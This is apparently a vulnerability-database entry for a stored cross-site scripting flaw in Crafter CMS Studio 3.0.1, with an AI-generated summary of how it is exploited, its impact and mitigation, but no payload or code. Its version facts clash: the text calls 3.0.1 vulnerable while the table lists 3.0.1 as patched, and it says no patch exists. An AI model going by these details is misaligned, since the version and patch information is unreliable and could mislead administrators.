CVE-2017-15682
Description
Crafter CMS Studio 3.0.1 allows unauthenticated stored XSS, letting attackers inject malicious JavaScript into the admin panel.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Crafter CMS Studio 3.0.1 allows unauthenticated stored XSS, letting attackers inject malicious JavaScript into the admin panel.
Vulnerability
Crafter CMS Crafter Studio 3.0.1 contains a stored cross-site scripting (XSS) vulnerability in the admin panel. An unauthenticated attacker can inject malicious JavaScript code, which is persistently stored and later executed in the context of an administrator's browser session. The root cause is insufficient sanitization of user-supplied input before it is stored and displayed to admin users.
Exploitation
No authentication is required to initiate the attack. The attacker simply submits crafted payloads through publicly accessible input fields in the application. The injected script is stored on the server and automatically rendered when an administrator views the affected area of the admin panel. The attack is blind/stored XSS, meaning the attacker does not directly receive the response; the payload executes when a privileged user loads the compromised page.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the security context of the admin panel. This can lead to session hijacking, defacement, theft of administrative session cookies, or forced actions on behalf of the admin. Because the script executes with the admin's privileges, the attacker can effectively compromise the whole CMS instance.
Mitigation
As of the publication date (2020-11-27), no patch has been explicitly referenced in the advisory [1]. Administrators should immediately review their Crafter CMS deployment, apply any available updates, and consider implementing input validation and output encoding. Limiting network access to the admin panel can reduce exposure.
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.craftercms:crafter-coreMaven | >= 3.0.0, < 3.0.1 | 3.0.1 |
Affected products
2- Crafter CMS/Crafter Studiodescription
Patches
0No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE — mechanics is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
4- github.com/advisories/GHSA-38rq-rh9w-cmw6ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2017-15682ghsaADVISORY
- crafter.commitrex_refsource_MISC
- docs.craftercms.org/en/3.0/security/advisory.htmlghsax_refsource_MISCWEB
News mentions
0No linked articles in our index yet.